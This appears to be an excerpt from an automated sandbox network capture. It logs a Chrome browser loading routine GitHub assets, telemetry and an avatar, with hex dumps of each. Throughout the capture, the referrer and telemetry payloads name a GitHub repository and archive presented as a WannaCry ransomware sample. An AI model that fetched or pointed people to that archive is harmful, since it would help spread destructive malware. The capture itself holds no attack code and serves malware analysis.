                                                                                      2024-03-23 14:47:26 UTC1299INData Raw: 73 29 2c 75 73 65 72 3a 6c 28 7b 69 64 3a 6c 28 6f 29 2c 6e 61 6d 65 3a 6c 28 73 29 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 6c 28 73 29 7d 29 2c 63 68 61 6c 6c 65 6e 67 65 3a 6c 28 6f 29 2c 70 75 62 4b 65 79 43 72 65 64 50 61 72 61 6d 73 3a 6c 28 73 29 2c 74 69 6d 65 6f 75 74 3a 63 28 73 29 2c 65 78 63 6c 75 64 65 43 72 65 64 65 6e 74 69 61 6c 73 3a 63 28 5b 64 5d 29 2c 61 75 74 68 65 6e 74 69 63 61 74 6f 72 53 65 6c 65 63 74 69 6f 6e 3a 63 28 73 29 2c 61 74 74 65 73 74 61 74 69 6f 6e 3a 63 28 73 29 2c 65 78 74 65 6e 73 69 6f 6e 73 3a 63 28 68 29 7d 29 2c 73 69 67 6e 61 6c 3a 63 28 73 29 7d 2c 66 3d 7b 74 79 70 65 3a 6c 28 73 29 2c 69 64 3a 6c 28 73 29 2c 72 61 77 49 64 3a 6c 28 6f 29 2c 61 75 74 68 65 6e 74 69 63 61 74 6f 72 41 74 74 61 63 68 6d 65 6e 74
                                                                                      Data Ascii: s),user:l({id:l(o),name:l(s),displayName:l(s)}),challenge:l(o),pubKeyCredParams:l(s),timeout:c(s),excludeCredentials:c([d]),authenticatorSelection:c(s),attestation:c(s),extensions:c(h)}),signal:c(s)},f={type:l(s),id:l(s),rawId:l(o),authenticatorAttachment


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      88192.168.2.1649794140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1114
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:26 UTC1114OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      2024-03-23 14:47:26 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.085648
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 916A:9DF9:2F1CA5:76F6DC:65FEEB7E
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      89192.168.2.1649795140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1080
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:26 UTC1080OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 70 61 67 65 5f 76 69 65 77 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","page_views":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2
                                                                                      2024-03-23 14:47:27 UTC580INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.002051
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 9178:2D7068:2E3B32:762E4E:65FEEB7E
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      90192.168.2.1649797185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC700OUTGET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 43926
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Mon, 18 Dec 2023 16:53:05 GMT
                                                                                      ETag: 0x8DBFFE9CE26CFC7
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2431062
                                                                                      X-Served-By: cache-iad-kjyo7100095-IAD, cache-lga21961-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 349, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 60583bf237421ee7ceaed896b4282a8db6f7e7c6
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6e 73 65 6e 74 2d 62 61 6e 6e 65 72 5f 64 69 73 74 5f 63 6f 6e 73 65 6e 74 2d 62 61 6e 6e 65 72 5f 6a 73 22 5d 2c 7b 39 34 32 32 39 3a 65 3d 3e 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 69 66 28 6f 5b 72 5d 29 72 65 74 75 72 6e 20 6f 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6e 3d 6f 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_consent-banner_dist_consent-banner_js"],{94229:e=>{window,e.exports=function(e){var o={};function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 38 4a 77 55 57 2d 52 34 62 4a 52 63 66 6c 3a 65 6e 61 62 6c 65 64 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 44 42 44 42 44 42 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 35 29 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 7d 2e 65 72 4c 36 39 30 5f 38 4a 77 55 57 2d 52 34 62 4a 52 63 66 6c 3a 64 69 73 61 62 6c 65 64 7b 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 5f 31 7a 4e 51 4f 71 78 70 42 46 53 6f 6b 65 43 4c 47 69 5f 68 47 72 7b 62 6f 72 64
                                                                                      Data Ascii: 8JwUW-R4bJRcfl:enabled:focus{background-color:#DBDBDB;box-shadow:0px 4px 10px rgba(0,0,0,0.25);border:2px solid #000}.erL690_8JwUW-R4bJRcfl:disabled{opacity:1;color:rgba(0,0,0,0.2);background-color:rgba(0,0,0,0.2);border:none}._1zNQOqxpBFSokeCLGi_hGr{bord
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 20 55 49 2c 20 53 65 67 6f 65 55 49 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 7d 2e 66 36 51 4b 4a 44 37 66 68 53 62 6e 4a 4c 61 72 54 4c 2d 57 2d 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 5f 32 6a 30 66 6d 75 67 4c 62 31 46 67 59 7a 36 4b 50 75 42 39 31 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 25 3b 6d 69 6e 2d 77 69
                                                                                      Data Ascii: :0;font-family:Segoe UI, SegoeUI, Arial, sans-serif;font-style:normal;font-weight:normal;font-size:13px;line-height:16px}.f6QKJD7fhSbnJLarTL-W- a{text-decoration:underline}._2j0fmugLb1FgYz6KPuB91w{display:inline-block;margin-left:5%;margin-right:5%;min-wi
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 64 69 76 5b 64 69 72 3d 22 72 74 6c 22 5d 20 2e 5f 33 6b 57 79 42 52 62 57 5f 64 67 6e 4d 69 45 79 78 30 36 46 75 34 7b 6d 61 72 67 69 6e 3a 32 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 75 43 59 76 4b 76 48 58
                                                                                      Data Ascii: Arial, sans-serif;font-style:normal;font-weight:normal;font-size:13px;line-height:13px;display:flex;align-items:center;text-align:center;color:#666;background-color:#fff}div[dir="rtl"] ._3kWyBRbW_dgnMiEyx06Fu4{margin:2px;padding:12px;float:left}.uCYvKvHX
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 33 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 20 55 49 2c 20 53 65 67 6f 65 55 49 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 7d 2e 5f 31 6c 38 77 4d 5f 34 6d 52 59 47 7a 33 49 75 37 6c 33 42 5a 52 37 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 32 55 45 30 33 51 53 30 32 61 5a 47 6b 73 6c 65 67 4e 5f 46 2d 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74
                                                                                      Data Ascii: rgin-top:0;margin-bottom:13px;font-family:Segoe UI, SegoeUI, Arial, sans-serif;font-style:normal;font-weight:normal;font-size:15px;line-height:20px}._1l8wM_4mRYGz3Iu7l3BZR7{display:block}._2UE03QS02aZGkslegN_F-i{display:inline-block;position:relative;left
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 46 56 32 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2b 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 30 70 78 3b 6c 65 66 74 3a 38 70 78 3b 68 65 69 67 68 74 3a 39 70 78 3b 77 69 64 74 68 3a 39 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 7d 64 69 76 5b 64 69 72 3d 22 72 74 6c 22 5d 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 5f 31 64 70 38 56 70 35 6d 33 48 77 41 71 47 78 38 71 42 6d 46 56 32 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2b 6c 61 62 65 6c 3a 68 6f 76 65
                                                                                      Data Ascii: FV2:not(:disabled)+label:hover::after{display:block;position:absolute;top:10px;left:8px;height:9px;width:9px;content:"";border-radius:50%;background-color:rgba(0,0,0,0.8)}div[dir="rtl"] input[type="radio"]._1dp8Vp5m3HwAqGx8qBmFV2:not(:disabled)+label:hove
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 38 30 25 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 31 39 70 78 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 20 55 49 2c 20 53 65 67 6f 65 55 49 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 64 69 76 5b 64 69 72 3d 22 72 74 6c 22 5d 20 2e 5f 33 52 4a 7a 65 4c 33 6c 39 52 6c 5f 6c 41 51 45
                                                                                      Data Ascii: ding-right:0;width:80%;width:calc(100% - 19px);font-family:Segoe UI, SegoeUI, Arial, sans-serif;font-style:normal;font-weight:normal;font-size:15px;line-height:20px;text-transform:none;cursor:pointer;box-sizing:border-box}div[dir="rtl"] ._3RJzeL3l9Rl_lAQE
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 32 62 76 73 62 33 75 62 41 70 79 5a 30 55 47 6f 51 41 39 4f 39 54 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 41 46 73 4a 45 39 34 38 6d 75 59 79 7a 43 4d 6b 74 64 7a 75 6b 7b 74 6f 70 3a 31 2e 38 25 3b 77 69 64 74 68 3a 39 33 2e 33 33 25 3b 68 65 69 67 68 74 3a 39 36 2e 34 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 75 43 59 76 4b 76 48 58 72 68 6a 4e 67 66 6c 76 31 56 71 64 44 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 34 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 5f 31 6b 42 6b 48 51 31 56 31 77 75 33 6b 6c 2d 59 63 4c 67 55 72 36 7b 68 65 69 67 68 74 3a 36 32 25 3b 68 65 69 67 68
                                                                                      Data Ascii: 0;width:100%}._2bvsb3ubApyZ0UGoQA9O9T{overflow:hidden}.AFsJE948muYyzCMktdzuk{top:1.8%;width:93.33%;height:96.4%;overflow:hidden}.uCYvKvHXrhjNgflv1VqdD{margin-top:24px;margin-left:24px;margin-right:24px;height:100%}._1kBkHQ1V1wu3kl-YcLgUr6{height:62%;heigh
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 72 6d 3a 22 5f 31 55 70 63 32 4e 6a 59 38 41 6c 44 6e 31 37 37 59 6f 56 6a 30 79 22 2c 69 6e 66 6f 49 63 6f 6e 3a 22 5f 31 56 5f 68 6c 55 2d 37 6a 64 74 50 69 6f 6f 48 4d 75 38 39 42 42 22 2c 62 61 6e 6e 65 72 49 6e 66 6f 72 6d 42 6f 64 79 3a 22 66 36 51 4b 4a 44 37 66 68 53 62 6e 4a 4c 61 72 54 4c 2d 57 2d 22 2c 62 75 74 74 6f 6e 47 72 6f 75 70 3a 22 5f 32 6a 30 66 6d 75 67 4c 62 31 46 67 59 7a 36 4b 50 75 42 39 31 77 22 2c 62 61 6e 6e 65 72 42 75 74 74 6f 6e 3a 22 5f 31 58 75 43 69 32 57 68 69 71 65 57 52 55 56 70 33 70 6e 46 47 33 22 2c 63 6f 6f 6b 69 65 4d 6f 64 61 6c 3a 22 5f 32 62 76 73 62 33 75 62 41 70 79 5a 30 55 47 6f 51 41 39 4f 39 54 22 2c 6d 6f 64 61 6c 43 6f 6e 74 61 69 6e 65 72 3a 22 41 46 73 4a 45 39 34 38 6d 75 59 79 7a 43 4d 6b 74 64 7a
                                                                                      Data Ascii: rm:"_1Upc2NjY8AlDn177YoVj0y",infoIcon:"_1V_hlU-7jdtPiooHMu89BB",bannerInformBody:"f6QKJD7fhSbnJLarTL-W-",buttonGroup:"_2j0fmugLb1FgYz6KPuB91w",bannerButton:"_1XuCi2WhiqeWRUVp3pnFG3",cookieModal:"_2bvsb3ubApyZ0UGoQA9O9T",modalContainer:"AFsJE948muYyzCMktdz
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 3d 3d 65 29 7b 6f 3d 74 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 6f 29 7b 66 6f 72 28 76 61 72 20 74 3d 7b 7d 2c 72 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 2c 64 3d 6f 2e 62 61 73 65 3f 69 5b 30 5d 2b 6f 2e 62 61 73 65 3a 69 5b 30 5d 2c 73 3d 74 5b 64 5d 7c 7c 30 2c 75 3d 22 22 2e 63 6f 6e 63 61 74 28 64 2c 22 20 22 29 2e 63 6f 6e 63 61 74 28 73 29 3b 74 5b 64 5d 3d 73 2b 31 3b 76 61 72 20 67 3d 6c 28 75 29 2c 66 3d 7b 63 73 73 3a 69 5b 31 5d 2c 6d 65 64 69 61 3a 69 5b 32 5d 2c 73 6f 75 72 63 65 4d 61 70 3a 69 5b 33 5d 7d 3b 2d 31 21 3d 3d 67 3f 28 61 5b 67 5d 2e 72 65 66 65 72 65 6e 63 65 73 2b 2b 2c 61 5b 67 5d 2e 75 70 64 61 74 65 72 28 66 29 29
                                                                                      Data Ascii: ==e){o=t;break}return o}function d(e,o){for(var t={},r=[],n=0;n<e.length;n++){var i=e[n],d=o.base?i[0]+o.base:i[0],s=t[d]||0,u="".concat(d," ").concat(s);t[d]=s+1;var g=l(u),f={css:i[1],media:i[2],sourceMap:i[3]};-1!==g?(a[g].references++,a[g].updater(f))


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      91192.168.2.1649709185.199.109.1334436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC676OUTGET /u/19915931?v=4&size=40 HTTP/1.1
                                                                                      Host: avatars.githubusercontent.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC943INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 954
                                                                                      Cache-Control: max-age=300
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Content-Type: image/jpeg
                                                                                      ETag: "71e07e961a6aff9041ee787b6b301e8559ffb9cbc59184fc55f4eb7dfc7847db"
                                                                                      Last-Modified: Wed, 10 May 2017 16:40:01 GMT
                                                                                      Strict-Transport-Security: max-age=31557600
                                                                                      timing-allow-origin: https://github.com
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: deny
                                                                                      x-github-tenant:
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-GitHub-Request-Id: 808A:1B54EE:308BD2:39F2C4:65F05CFD
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Via: 1.1 varnish
                                                                                      X-Served-By: cache-lga21958-LGA
                                                                                      X-Cache: HIT
                                                                                      X-Cache-Hits: 1
                                                                                      X-Timer: S1711205247.934461,VS0,VE1
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      X-Fastly-Request-ID: b3fa3f1ec4d8651b5351e34b592656f555e0f89d
                                                                                      Expires: Sat, 23 Mar 2024 14:52:26 GMT
                                                                                      Source-Age: 953985
                                                                                      Vary: Authorization,Accept-Encoding
